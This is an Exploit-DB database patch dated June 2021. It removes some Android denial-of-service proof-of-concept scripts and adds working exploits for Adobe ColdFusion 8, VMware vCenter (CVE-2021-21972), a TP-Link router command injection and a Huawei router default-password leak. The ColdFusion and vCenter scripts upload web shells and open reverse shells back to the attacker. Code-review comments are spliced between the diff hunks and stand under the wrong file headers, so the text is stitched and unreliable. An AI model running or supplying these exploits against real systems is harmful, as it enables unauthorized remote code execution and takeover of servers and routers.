From 135e56dda88aa004b0a022533ede8e4d7e4d3264 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 25 Jun 2021 05:01:52 +0000
Subject: [PATCH] DB: 2021-06-25

16 changes to exploits/shellcodes

BasicNote 1.1.9 - Denial of Service (PoC)
ColorNote 4.1.9 - Denial of Service (PoC)
Notepad notes 2.6.7 - Denial of Service (PoC)
Blacknote 2.2.1 - Denial of Service (PoC)
Inkpad Notepad & To do list 4.3.61 - Denial of Service (PoC)
GeoGebra 3D Calculator 5.0.511.0 - Denial of Service (PoC)
VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution (RCE) (Unauthenticated)
Adobe ColdFusion 8 - Remote Command Execution (RCE)
TP-Link TL-WR841N - Command Injection
Huawei dg8045 - Authentication Bypass
---
 exploits/android/dos/49938.py | 35 --------
 exploits/android/dos/49939.py | 37 ---------
 exploits/android/dos/49940.py | 35 --------
 exploits/android/dos/49941.py | 35 --------
 exploits/android/dos/49946.txt | 35 --------
 exploits/android/local/49656.py | 28 -------
 exploits/cfm/webapps/50057.py | 121 ++++++++++++++++++++++++++++
 exploits/hardware/webapps/50058.py | 75 +++++++++++++++++
 exploits/hardware/webapps/50059.txt | 45 +++++++++++
 exploits/multiple/webapps/50056.py | 117 +++++++++++++++++++++++++++
 files_exploits.csv | 10 +--
 11 files changed, 362 insertions(+), 211 deletions(-)
 delete mode 100755 exploits/android/dos/49938.py
 delete mode 100755 exploits/android/dos/49939.py
 delete mode 100755 exploits/android/dos/49940.py
 delete mode 100755 exploits/android/dos/49941.py
 delete mode 100644 exploits/android/dos/49946.txt
 delete mode 100755 exploits/android/local/49656.py
 create mode 100755 exploits/cfm/webapps/50057.py
 create mode 100755 exploits/hardware/webapps/50058.py
 create mode 100644 exploits/hardware/webapps/50059.txt
 create mode 100755 exploits/multiple/webapps/50056.py

diff --git a/exploits/android/dos/49938.py b/exploits/android/dos/49938.py
deleted file mode 100755
index 7e96e468d..000000000
--- a/exploits/android/dos/49938.py
+++ /dev/null
@@ -1,35 +0,0 @@ -# Exploit Title: BasicNote 1.1.9 - Denial of Service (PoC) -# Date: 2021-06-02 -# Author: Brian Rodríguez -# Download Link: https://play.google.com/store/apps/details?id=notizen.basic.notes.notas.note.notepad&hl=es_MX -# Version: 1.1.9 -# Category: DoS (Android) - -##### Vulnerability ##### - -BasicNote - Notas, Bloc de notas is vulnerable to a DoS condition when two long lists of characters are being used when creating a note: - -# STEPS # -# Open the program -# Create a new Note. -# Run the python exploit script payload.py, it will create a new payload.txt file -# Copy the content of the file "payload.txt" -# Paste the content from payload.txt twice in the new Note. -# Crashed - -Successful exploitation will causes application stop working. - -I have been able to test this exploit against Android 8.0. - -##### PoC ##### - -#!/usr/bin/env python -buffer = "\x41" * 350000 - -try: - f = open("payload.txt","w") - f.write(buffer) - f.close() - print ("File created") -except: - print ("File cannot be created") \ No newline at end of file diff --git a/exploits/android/dos/49939.py b/exploits/android/dos/49939.py deleted file mode 100755 index a7a0a1582..000000000 --- a/exploits/android/dos/49939.py +++ /dev/null 
@@ -1,37 +0,0 @@ -# Exploit Title: ColorNote 4.1.9 - Denial of Service (PoC) -# Date: 2021-06-02 -# Author: Brian Rodríguez -# Download Link: https://play.google.com/store/apps/details?id=com.socialnmobile.dictapps.notepad.color.note&hl=es_MX -# Version: 4.1.9 -# Category: DoS (Android) - -##### Vulnerability ##### - -Color Note is vulnerable to a DoS condition when a long list of characters is being used. - -# STEPS # -# Open the program -# Create a new Note. -# Run the python exploit script payload.py, it will create a new payload.txt file -# Copy the content of the file "payload.txt" -# Paste the content from payload.txt in the new note. -# Click the "Return" button twice. -# Start clicking the screen. -# Crashed - -Successful exploitation will causes application stop working. - -I have been able to test this exploit against Android 8.0. - -##### PoC ##### ---> payload.py <-- -#!/usr/bin/env python -buffer = "\x41" * 350000 - -try: - f = open("payload.txt","w") - f.write(buffer) - f.close() - print ("File created") -except: - print ("File cannot be created") \ No newline at end of file diff --git a/exploits/android/dos/49940.py b/exploits/android/dos/49940.py deleted file mode 100755 index 91566e8a4..000000000 --- a/exploits/android/dos/49940.py +++ /dev/null 
@@ -1,35 +0,0 @@ -# Exploit Title: Notepad notes 2.6.7 - Denial of Service (PoC) -# Date: 2021-06-02 -# Author: Brian Rodríguez -# Download Link: https://play.google.com/store/apps/details?id=com.hlcsdev.x.notepad&hl=es_MX -# Version: 2.6.7 -# Category: DoS (Android) - -##### Vulnerability ##### - -Bloc de notas is vulnerable to a DoS condition when a long lists of characters is being used when creating a note: - -# STEPS # -# Open the program. -# Create a new Note. -# Run the python exploit script payload.py, it will create a new payload.txt file -# Copy the content of the file "payload.txt" -# Paste the content from payload.txt twice in the new Note. -# Crashed - -Successful exploitation will cause application to stop working. - -I have been able to test this exploit against Android 8.0. - -##### PoC ##### ---> payload.py <-- -#!/usr/bin/env python -buffer = "\x41" * 350000 - -try: - f = open("payload.txt","w") - f.write(buffer) - f.close() - print ("File created") -except: - print ("File cannot be created") \ No newline at end of file diff --git a/exploits/android/dos/49941.py b/exploits/android/dos/49941.py deleted file mode 100755 index cee03c492..000000000 --- a/exploits/android/dos/49941.py +++ /dev/null 
@@ -1,35 +0,0 @@ -# Exploit Title: Blacknote 2.2.1 - Denial of Service (PoC) -# Date: 2021-06-02 -# Author: Brian Rodríguez -# Download Link: https://play.google.com/store/apps/details?id=notepad.note.notas.notes.notizen&hl=es_MX -# Version: 2.2.1 -# Category: DoS (Android) - -##### Vulnerability ##### - -BlackNote Bloc de notas is vulnerable to a DoS condition when a long list of characters is being used when creating a note: - -# STEPS # -# Open the program. -# Create a new Note. -# Run the python exploit script payload.py, it will create a new payload.txt file -# Copy the content of the file "payload.txt" -# Paste the content from payload.txt twice in the new Note. -# Crashed - -Successful exploitation will cause the application to stop working. - -I have been able to test this exploit against Android 8.0. - -##### PoC ##### ---> payload.py <-- -#!/usr/bin/env python -buffer = "\x41" * 350000 - -try: - f = open("payload.txt","w") - f.write(buffer) - f.close() - print ("File created") -except: - print ("File cannot be created") \ No newline at end of file diff --git a/exploits/android/dos/49946.txt b/exploits/android/dos/49946.txt deleted file mode 100644 index 6434b7f5c..000000000 --- a/exploits/android/dos/49946.txt +++ /dev/null 
@@ -1,35 +0,0 @@ -# Exploit Title: Inkpad Notepad & To do list 4.3.61 - Denial of Service (PoC) -# Date: 2021-06-03 -# Author: Brian Rodríguez -# Download Link: https://play.google.com/store/apps/details?id=com.workpail.inkpad.notepad.notes&hl=es_MX -# Version: 4.3.61 -# Category: DoS (Android) - -##### Vulnerability ##### - -InkPad Bloc de notas - Tareas is vulnerable to a DoS condition when a long list of characters is being used when creating a note: - -# STEPS # -# Open the program. -# Create a new Note. -# Run the python exploit script payload.py, it will create a new payload.txt file -# Copy the content of the file "payload.txt" -# Paste the content from payload.txt twice in the new Note. -# Crashed - -Successful exploitation will cause the application to stop working. - -I have been able to test this exploit against Android 8.0. - -##### PoC ##### ---> payload.py <-- -#!/usr/bin/env python -buffer = "\x41" * 50000 - -try: - f = open("payload.txt","w") - f.write(buffer) - f.close() - print ("File created") -except: - print ("File cannot be created") \ No newline at end of file diff --git a/exploits/android/local/49656.py b/exploits/android/local/49656.py deleted file mode 100755 index fec83844d..000000000 --- a/exploits/android/local/49656.py +++ /dev/null 
@@ -1,28 +0,0 @@ -# Exploit Title: GeoGebra 3D Calculator 5.0.511.0 - Denial of Service (PoC) -# Date: 2021-03-15 -# Author: Brian Rodríguez -# Software Site: https://www.geogebra.org/download -# Download Link: https://play.google.com/store/apps/details?id=org.geogebra.android.g3d&utm_source=Download+page&utm_medium=Website&utm_campaign=3D+Calculator+for+Android -# Version: 5.0.511.0 -# Category: DoS (Android) - -##### Vulnerability ##### - -Graficador GeoGebra 3D is vulnerable to a DoS condition when a long list of characters is being used in field "Entrada..." text box. - -Successful exploitation will causes application stop working. - -I have been able to test this exploit against Android 10.0. - -##### PoC ##### - -#!/usr/bin/env python -buffer = "\x41" * 8000 - -try: - f = open("payload.txt","w") - f.write(buffer) - f.close() - print ("File created") -except: - print ("File cannot be created") \ No newline at end of file diff --git a/exploits/cfm/webapps/50057.py b/exploits/cfm/webapps/50057.py new file mode 100755 index 000000000..4f1d42b08 --- /dev/null +++ b/exploits/cfm/webapps/50057.py 
@@ -0,0 +1,121 @@ +# Exploit Title: Adobe ColdFusion 8 - Remote Command Execution (RCE) +# Google Dork: intext:"adobe coldfusion 8" +# Date: 24/06/2021 +# Exploit Author: Pergyz +# Vendor Homepage: https://www.adobe.com/sea/products/coldfusion-family.html +# Version: 8 +# Tested on: Microsoft Windows Server 2008 R2 Standard +# CVE : CVE-2009-2265 + +#!/usr/bin/python3 + +from multiprocessing import Process +import io +import mimetypes +import os +import urllib.request +import uuid + +class MultiPartForm: + + def __init__(self): + self.files = [] + self.boundary = uuid.uuid4().hex.encode('utf-8') + return + + def get_content_type(self): + return 'multipart/form-data; boundary={}'.format(self.boundary.decode('utf-8')) + + def add_file(self, fieldname, filename, fileHandle, mimetype=None): + body = fileHandle.read() + + if mimetype is None: + mimetype = (mimetypes.guess_type(filename)[0] or 'application/octet-stream') + + self.files.append((fieldname, filename, mimetype, body)) + return + + @staticmethod + def _attached_file(name, filename): + return (f'Content-Disposition: form-data; name="{name}"; filename="(unknown)"\r\n').encode('utf-8') + + @staticmethod + def _content_type(ct): + return 'Content-Type: {}\r\n'.format(ct).encode('utf-8') + + def __bytes__(self): + buffer = io.BytesIO() + boundary = b'--' + self.boundary + b'\r\n' + + for f_name, filename, f_content_type, body in self.files: + buffer.write(boundary) + buffer.write(self._attached_file(f_name, filename)) + buffer.write(self._content_type(f_content_type)) + buffer.write(b'\r\n') + buffer.write(body) + buffer.write(b'\r\n') + + buffer.write(b'--' + self.boundary + b'--\r\n') + return buffer.getvalue() + +def execute_payload(): + print('\nExecuting the payload...') + print(urllib.request.urlopen(f'http://{rhost}:{rport}/userfiles/file/(unknown).jsp').read().decode('utf-8')) + +def listen_connection(): + print('\nListening for connection...') + os.system(f'nc -nlvp {lport}') + +if __name__ == 
'__main__': + # Define some information + lhost = '10.10.16.4' + lport = 4444 + rhost = "10.10.10.11" + rport = 8500 + filename = uuid.uuid4().hex + + # Generate a payload that connects back and spawns a command shell + print("\nGenerating a payload...") + os.system(f'msfvenom -p java/jsp_shell_reverse_tcp LHOST={lhost} LPORT={lport} -o (unknown).jsp') + + # Encode the form data + form = MultiPartForm() + form.add_file('newfile', filename + '.txt', fileHandle=open(filename + '.jsp', 'rb')) + data = bytes(form) + + # Create a request + request = urllib.request.Request(f'http://{rhost}:{rport}/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/(unknown).jsp%00', data=data) + request.add_header('Content-type', form.get_content_type()) + request.add_header('Content-length', len(data)) + + # Print the request + print('\nPriting request...') + + for name, value in request.header_items(): + print(f'{name}: {value}') + + print('\n' + request.data.decode('utf-8')) + + # Send the request and print the response + print('\nSending request and printing response...') + print(urllib.request.urlopen(request).read().decode('utf-8')) + + # Print some information + print('\nPrinting some information for debugging...') + print(f'lhost: {lhost}') + print(f'lport: {lport}') + print(f'rhost: {rhost}') + print(f'rport: {rport}') + print(f'payload: (unknown).jsp') + + # Delete the payload + print("\nDeleting the payload...") + os.system(f'rm (unknown).jsp') + + # Listen for connections and execute the payload + p1 = Process(target=listen_connection) + p1.start() + p2 = Process(target=execute_payload) + p2.start() + p1.join() + p2.join() \ No newline at end of file diff --git a/exploits/hardware/webapps/50058.py b/exploits/hardware/webapps/50058.py new file mode 100755 index 000000000..f32b5ba2d --- /dev/null +++ b/exploits/hardware/webapps/50058.py 
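Review bot: The `#!/usr/bin/python3` line comes after the header comment block, so it is not a shebang and the file's 100755 mode will not select Python 3 — it belongs on line 1. `form.add_file('newfile', ..., fileHandle=open(filename + '.jsp', 'rb'))` never closes the handle; wrapping the `add_file` call in `with open(filename + '.jsp', 'rb') as fh:` fixes that without changing behaviour, and `'\nPriting request...'` is a typo for `Printing`. The `(unknown)` tokens in `_attached_file` and in the `os.system`, `urlopen` and `Request` URL strings look like an extraction artifact of this listing rather than the author's code, so I have not reviewed those values. For defenders the request shape is the useful part of the file: a `POST` to `upload.cfm?Command=FileUpload&Type=File&CurrentFolder=...%00` under `/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/` is the CVE-2009-2265 pattern to alert on in web logs, and the `__main__` block continues on the next page line.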
@@ -0,0 +1,75 @@ +# Exploit Title: TP-Link TL-WR841N - Command Injection +# Date: 2020-12-13 +# Exploit Author: Koh You Liang +# Vendor Homepage: https://www.tp-link.com/ +# Software Link: https://static.tp-link.com/TL-WR841N(JP)_V13_161028.zip +# Version: TL-WR841N 0.9.1 4.0 +# Tested on: Windows 10 +# CVE : CVE-2020-35575 + +import requests +import sys +import time + +try: + _ = sys.argv[2] + payload = ' '.join(sys.argv[1:]) +except IndexError: + try: + payload = sys.argv[1] + except IndexError: + print("[*] Command not specified, using the default `cat etc/passwd=`") + payload = 'cat etc/passwd' + +# Default credentials is admin:admin - replace with your own +cookies = { + 'Authorization': 'Basic YWRtaW46YWRtaW4=' +} + +headers = { + 'Host': '192.168.0.1', + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko=/20100101 Firefox/84.0', + 'Accept': '*/*', + 'Accept-Language': 'en-US,en;q=0.5', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'text/plain', + 'Content-Length': '197', + 'Origin': 'http://192.168.0.1', + 'Connection': 'close', + 'Referer': 'http://192.168.0.1/mainFrame.htm', +} + +data1 = \ +'''[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,8\r\nmaxHopCount=20\r\ntimeout=50\r\nnumberOfTries=1\r\nhost="`{}`"\r\ndataBlockSize=64\r\nX_TP_ConnName=ewan_ipoe_d\r\ndiagnosticsState=Requested\r\nX_TP_HopSeq=0\r\n'''.format(payload) +response1 = requests.post('http://192.168.0.1/cgi?2', headers=headers, cookies=cookies, data=data1, verify=False) +print('[+] Sending payload...') + +try: + response1.text.splitlines()[0] +except IndexError: + sys.exit('[-] Cannot get response. 
Please check your cookie.') +if response1.text.splitlines()[0] != '[error]0': + sys.exit('[*] Router/Firmware is not vulnerable.') + +data2 = '[ACT_OP_TRACERT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\r\n' +response2 = requests.post('http://192.168.0.1/cgi?7', headers=headers, cookies=cookies, data=data2, verify=False) +print('[+] Receiving response from router...') +time.sleep(0.8) # Buffer time for traceroute to succeed + +data3 = '''[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,3\r\ndiagnosticsState\r\nX_TP_HopSeq\r\nX_TP_Result\r\n''' +response3 = requests.post('http://192.168.0.1/cgi?1', headers=headers, cookies=cookies, data=data3, verify=False) + +if '=:' in response3.text.splitlines()[3]: + print('[-] Command not supported.') +else: + print('[+] Exploit successful!') + for line_number, line in enumerate(response3.text.splitlines()): + try: + if line_number == 3: + print(line[12:]) + if line_number > 3 and line != '[error]0': + print(line) + if 'not known' in line: + break + except IndexError: + break \ No newline at end of file diff --git a/exploits/hardware/webapps/50059.txt b/exploits/hardware/webapps/50059.txt new file mode 100644 index 000000000..7bf8bb178 --- /dev/null +++ b/exploits/hardware/webapps/50059.txt 
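Review bot: `verify=False` is passed to every `requests.post` here against plain `http://192.168.0.1/cgi?…` URLs, where no TLS verification can happen, so the argument is dead and should be dropped or explained. `response1.text.splitlines()[0]` is evaluated twice (inside the `try` and again in the following `if`) and `response2` is assigned but never read; binding the first line once, e.g. `first_line = response1.text.splitlines()[0]`, lets the existing `IndexError` guard cover the comparison as well. The preconditions deserve a header line rather than an inline comment: the cookie is the factory default `admin:admin` (`Basic YWRtaW46YWRtaW4=`) and the target is the LAN address, i.e. this is an authenticated, post-login injection, so for defenders changing the default credential matters as much as the CVE-2020-35575 firmware fix, and the `TRACEROUTE_DIAG` request to `/cgi?2` with a backtick-wrapped `host` value is the artifact to look for in router logs. The `sys.exit(...)` call inside the `except IndexError` branch is split across this page line and the previous one.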
@@ -0,0 +1,45 @@
+# Title: Huawei dg8045 - Authentication Bypass
+# Date: 2020-06-24
+# Author: Abdalrahman Gamal
+# Vendor Homepage: www.huawei.com
+# Version: dg8045
+# Hardware Version: VER.A
+
+#POC:
+
+The default password of this router is the last 8 characters of the
+device's serial number which exist in the back of the device.
+
+An attacker can leak the serial number via the web app API like the
+following:
+
+************************Request************************
+GET /api/system/deviceinfo HTTP/1.1
+Host: 192.168.1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0)
+Gecko/20100101 Firefox/65.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://192.168.1.1/
+X-Requested-With: XMLHttpRequest
+Connection: close
+
+
+************************Response************************
+HTTP/1.1 200 OK
+Cache-Control: no-cache, no-store, max-age=0, must-revalidate
+X-Download-Options: noopen
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+Date: Thu, 24 Jun 2021 02:07 GMT+2
+Connection: Keep-Alive
+Content-Language: en
+Content-Type: application/javascript
+Content-Length: 141
+
+while(1); /*{"DeviceName":"DG8045","SerialNumber":"21530369847SK9252081","ManufacturerOUI":"00E0FC","UpTime":81590,"HardwareVersion":"VER.A"}*/
+
+
+
+You can use that serial number last 8 char/digits to login to the router.
\ No newline at end of file
diff --git a/exploits/multiple/webapps/50056.py b/exploits/multiple/webapps/50056.py
new file mode 100755
index 000000000..c7cd36259
--- /dev/null
+++ b/exploits/multiple/webapps/50056.py
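Review bot: The advisory never states the property that makes this a bypass: the `GET /api/system/deviceinfo` request shown carries no session cookie or `Authorization` header, so the endpoint appears to answer unauthenticated, and the `while(1);` prefix on the response only defeats cross-site script inclusion, not a direct request. It also gives no mitigation; a closing line such as `Mitigation: change the factory password and require an authenticated session for /api/system/deviceinfo` would make the write-up usable for defenders. The quoted response reproduces a real-looking `SerialNumber`, which a public advisory should redact.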
@@ -0,0 +1,117 @@ +# Exploit Title: VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution (RCE) (Unauthenticated) +# Date: 06/21/2021 +# Exploit Author: CHackA0101 +# Vendor Homepage: https://kb.vmware.com/s/article/82374 +# Software Link: https://www.vmware.com/products/vcenter-server.html +# Version: This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2). +# Tested on: VMware vCenter version 6.5 (OS: Linux 4.4.182-1.ph1 SMP UTC 2019 x86_64 GNU/Linux) +# CVE: 2021-21972 + +# More Info: https://github.com/chacka0101/exploits/blob/master/CVE-2021-21972/README.md + +#!/usr/bin/python2 + +import os +import urllib3 +import argparse +import sys +import requests +import base64 +import tarfile +import threading +import time + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +myargs=argparse.ArgumentParser() +myargs.add_argument('-T','--target',help='The IP address of the target',required=True) +myargs.add_argument('-L','--local',help='Your local IP',required=True) +args=myargs.parse_args() + +def getprompt(x): + print ("(CHackA0101-GNU/Linux)$ "+ str(x)) + +def getpath(path="/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/37/0/h5ngc.war/resources/shell4.jsp"): + fullpath="../" * 7 + path + return fullpath.replace('\\','/').replace('//','/') + +def createbackdoor(localip): + # shell4.jsp + backdoor = "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" + backdoor = base64.b64decode(backdoor).decode('utf-8') + f = open("shell4.jsp","w") + f.write(backdoor) + f.close() + # reverse.sh + # After decoding overwrite string 'CUSTOM_IP' for local IP + shell="IyEvYmluL2Jhc2gKYmFzaCAtaSA+JiAvZGV2L3RjcC9DVVNUT01fSVAvNDQzIDA+JjE=" + shell=base64.b64decode(shell).decode('utf-8') + shell=shell.replace('CUSTOM_IP',localip) + f=open("reverse.sh","w") + f.write(shell) + f.close() + # Move on with the payload + 
payload_file=tarfile.open('payload.tar','w') + myroute=getpath() + getprompt('Adding web backdoor to archive') + payload_file.add("shell4.jsp", myroute) + myroute=getpath("tmp/reverse.sh") + getprompt('Adding bash backdoor to archive') + payload_file.add("reverse.sh", myroute) + payload_file.close() + # cleaning up a little bit + os.unlink("reverse.sh") + os.unlink("shell4.jsp") + getprompt('Backdoor file just was created.') + +def launchexploit(ip): + res=requests.post('https://' + ip + '/ui/vropspluginui/rest/services/uploadova', files={'uploadFile':open('payload.tar', 'rb')}, verify=False, timeout=60) + if res.status_code == 200 and res.text == 'SUCCESS': + getprompt('Backdoor was uploaded successfully!') + return True + else: + getprompt('Backdoor failed to be uploaded. Target denied access.') + return False + +def testshell(ip): + getprompt('Looking for shell...') + shell_path="/ui/resources/shell4.jsp?cmd=uname+-a" + res=requests.get('https://' + ip + shell_path, verify=False, timeout=60) + if res.status_code==200: + getprompt('Shell was found!.') + response=res.text + if True: + getprompt('Shell is responsive.') + try: + response=re.findall("b>(.+)uname -a') + print(response) + except: + pass + return True + else: + getprompt('Sorry. Shell was not found.') + return False + +def opendoor(url): + time.sleep(3) + getprompt('Executing command.') + requests.get(url, verify=False, timeout=1800) + +def executebackdoor(ip, localip): + url="https://"+ip+"/ui/resources/shell4.jsp?cmd=bash%20/tmp/reverse.sh" + t=threading.Thread(target=opendoor,args=(url,)) + t.start() + getprompt('Setting up socket '+localip+':443') + os.system('nc -lnvp 443') + +if len(sys.argv)== 1: + myargs.print_help(sys.stderr) + sys.exit(1) +createbackdoor(args.local) +uploaded=launchexploit(args.target) +if uploaded: + tested=testshell(args.target) + if tested: + executebackdoor(args.target, args.local) +getprompt("Execution completed!") \ No newline at end of file 
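Review bot: In `testshell` the `if True:` wrapper guards nothing, and the bare `except: pass` under it swallows every error from the `re.findall(...)` line — including the `NameError` that line will raise because `re` is never imported in this file; narrow it to `except Exception as exc:` and print the reason so a parse failure is visible instead of silent. That `re.findall("b>(.+)uname -a')` line also has unbalanced quotes in this hunk, which I read as an extraction artifact of the listing rather than the author's code, so I have not tried to reconstruct it. `#!/usr/bin/python2` sits after the header comments, so the 100755 mode will not select an interpreter — state the intended one on line 1. `createbackdoor` unlinks `reverse.sh` and `shell4.jsp` but leaves `payload.tar` in the working directory. For defenders the distinguishing artifact is a `POST /ui/vropspluginui/rest/services/uploadova` whose tar member paths begin with `../` (see `getpath`), which is what the CVE-2021-21972 fix levels listed in the header close.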
diff --git a/files_exploits.csv b/files_exploits.csv
index 6ea794266..573fefb55 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6785,11 +6785,6 @@ id,file,description,date,author,type,platform,port
 49898,exploits/windows/dos/49898.txt,"iDailyDiary 4.30 - Denial of Service (PoC)",2021-05-24,"Ismael Nava",dos,windows,
 49906,exploits/windows/dos/49906.py,"RarmaRadio 2.72.8 - Denial of Service (PoC)",2021-05-26,"Ismael Nava",dos,windows,
 49917,exploits/windows/dos/49917.py,"DupTerminator 1.4.5639.37199 - Denial of Service (PoC)",2021-06-01,"Brian Rodriguez",dos,windows,
-49938,exploits/android/dos/49938.py,"BasicNote 1.1.9 - Denial of Service (PoC)",2021-06-03,"Brian Rodriguez",dos,android,
-49939,exploits/android/dos/49939.py,"ColorNote 4.1.9 - Denial of Service (PoC)",2021-06-03,"Brian Rodriguez",dos,android,
-49940,exploits/android/dos/49940.py,"Notepad notes 2.6.7 - Denial of Service (PoC)",2021-06-03,"Brian Rodriguez",dos,android,
-49941,exploits/android/dos/49941.py,"Blacknote 2.2.1 - Denial of Service (PoC)",2021-06-03,"Brian Rodriguez",dos,android,
-49946,exploits/android/dos/49946.txt,"Inkpad Notepad & To do list 4.3.61 - Denial of Service (PoC)",2021-06-04,"Brian Rodriguez",dos,android,
 49952,exploits/ios/dos/49952.py,"Color Notes 1.4 - Denial of Service (PoC)",2021-06-04,"Geovanni Ruiz",dos,ios,
 49953,exploits/ios/dos/49953.py,"Macaron Notes great notebook 5.5 - Denial of Service (PoC)",2021-06-04,"Geovanni Ruiz",dos,ios,
 49954,exploits/ios/dos/49954.py,"My Notes Safe 5.3 - Denial of Service (PoC)",2021-06-04,"Geovanni Ruiz",dos,ios,
@@ -11316,7 +11311,6 @@ id,file,description,date,author,type,platform,port
 49653,exploits/windows/local/49653.py,"GeoGebra Graphing Calculato‪r‬ 6.0.631.0 - Denial Of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows,
 49654,exploits/windows/local/49654.py,"GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows,
 49655,exploits/windows/local/49655.py,"GeoGebra CAS Calculato‪r‬ 6.0.631.0 - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows,
-49656,exploits/android/local/49656.py,"GeoGebra 3D Calculator 5.0.511.0 - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,android,
 49660,exploits/windows/local/49660.py,"FastStone Image Viewer 7.5 - .cur BITMAPINFOHEADER 'BitCount' Stack Based Buffer Overflow (ASLR & DEP Bypass)",2021-03-17,"Paolo Stagno",local,windows,
 49661,exploits/windows/local/49661.txt,"VFS for Git 1.0.21014.1 - 'GVFS.Service' Unquoted Service Path",2021-03-18,"Mohammed Alshehri",local,windows,
 49671,exploits/windows/local/49671.txt,"BRAdmin Professional 3.75 - 'BRA_Scheduler' Unquoted Service Path",2021-03-19,"Metin Yunus Kandemir",local,windows,
@@ -44203,3 +44197,7 @@ id,file,description,date,author,type,platform,port
 50053,exploits/php/webapps/50053.txt,"Online Library Management System 1.0 - 'Search' SQL Injection",2021-06-23,"Berk Can Geyikci",webapps,php,
 50054,exploits/php/webapps/50054.py,"Online Library Management System 1.0 - Arbitrary File Upload Remote Code Execution (Unauthenticated)",2021-06-23,"Berk Can Geyikci",webapps,php,
 50055,exploits/php/webapps/50055.txt,"Simple CRM 3.0 - 'email' SQL injection (Authentication Bypass)",2021-06-23,"Rinku Kumar",webapps,php,
+50056,exploits/multiple/webapps/50056.py,"VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-06-24,CHackA0101,webapps,multiple,
+50057,exploits/cfm/webapps/50057.py,"Adobe ColdFusion 8 - Remote Command Execution (RCE)",2021-06-24,Pergyz,webapps,cfm,
+50058,exploits/hardware/webapps/50058.py,"TP-Link TL-WR841N - Command Injection",2021-06-24,"Koh You Liang",webapps,hardware,
+50059,exploits/hardware/webapps/50059.txt,"Huawei dg8045 - Authentication Bypass",2021-06-24,"Abdalrahman Gamal",webapps,hardware,